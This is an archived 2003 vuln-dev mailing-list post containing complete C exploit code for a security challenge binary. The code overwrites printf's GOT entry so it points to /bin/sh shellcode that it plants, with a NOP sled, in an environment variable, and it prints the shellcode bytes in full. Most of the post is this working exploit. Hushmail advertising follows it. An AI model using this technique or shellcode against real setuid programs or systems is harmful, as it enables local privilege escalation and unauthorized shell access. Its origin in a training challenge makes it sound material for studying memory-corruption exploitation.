[Vuln-dev Challenge] example exploit for 2

ot_at_hushmail.com
Date: 05/24/03

  • Next message: D.: "[Vuln-dev Challenge] Challenge #2"
    Date: Sat, 24 May 2003 09:18:47 -0700
    To: vuln-dev@securityfocus.com
    
    

    example exploit for vuln-dev challenge 2, requires the address
    of the shellcode in the environment as an argument

    /*
     * example exploit code for vuln-dev challenge 2
     *
     * we overwrite printf's got table entry to point to our
     * shellcode in the environment
     *
     * omicron tau - ot@hushmail.com
     */

    /*
     * objdump, grep, and awk need to be in your path
     *
     * tested on linux 2.4.20 using env address 0xbfffe2ac
     *
     * rm db.log first
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    #define VULNPATH "./vdc2" /* path to vulnerable
    binary */

    /* /bin/sh */
    char shellcode[]=
        "\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
        "\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
        "\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
        "\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
        "\x63\x64\x65";

    unsigned int go; /* GOT entry address for printf */

    void
    find_got_addr()
    {
            FILE *p;
            char buf[1024];

            snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' |
    " \
                "awk '{ print \"0x\"$1 }'", VULNPATH);
            p = popen(buf, "r");
            fgets(buf, sizeof(buf), p);
            pclose(p);

            go = strtoul(buf, NULL, 0);
            go -= 2; /* ;; */

            printf("[!] using got addr 0x%x\n", go);
    }

    int
    main(int argc, char *argv[])
    {
            char envbuf[8192];
            char obuf[129];
            char scbuf[5];
            unsigned int scaddr;
            int i;

            if (argc < 2) {
                    fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
                    exit(1);
            }
            scaddr = strtoul(argv[1], NULL, 0);

            find_got_addr();

            memset(obuf, 0, sizeof(obuf));
            for (i = 0; i < sizeof(obuf) - 1; i+=4)
                    memcpy(&obuf[i], &go, 4);
            obuf[sizeof(obuf) - 1] = 0;

            memset(envbuf, 0x90, sizeof(envbuf));
            memcpy(&envbuf[8000], shellcode, strlen(shellcode));
            envbuf[sizeof(envbuf) - 1] = 0;
            setenv("SC", envbuf, 1);

            memcpy(scbuf, &scaddr, 4);
            scbuf[4] = 0;
            execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);

            return(0);
    }

    Concerned about your privacy? Follow this link to get
    FREE encrypted email: https://www.hushmail.com/?l=2

    Free, ultra-private instant messaging with Hush Messenger
    https://www.hushmail.com/services.php?subloc=messenger&l=434

    Big $$$ to be made with the HushMail Affiliate Program:
    https://www.hushmail.com/about.php?subloc=affiliate&l=427


  • Next message: D.: "[Vuln-dev Challenge] Challenge #2"

    Relevant Pages